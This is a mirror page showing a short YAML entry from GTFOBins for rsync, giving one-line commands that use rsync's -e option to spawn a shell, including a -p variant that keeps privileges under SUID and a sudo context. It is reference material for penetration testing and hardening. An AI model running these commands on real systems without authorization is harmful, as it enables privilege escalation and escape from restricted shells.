mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
14 lines
251 B
Plaintext
14 lines
251 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
rsync -e '/bin/sh -c "/bin/sh 0<&2 1>&2"' x:x
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
rsync -e '/bin/sh -p -c "/bin/sh -p 0<&2 1>&2"' x:x
|
|
shell: false
|
|
unprivileged:
|
|
...
|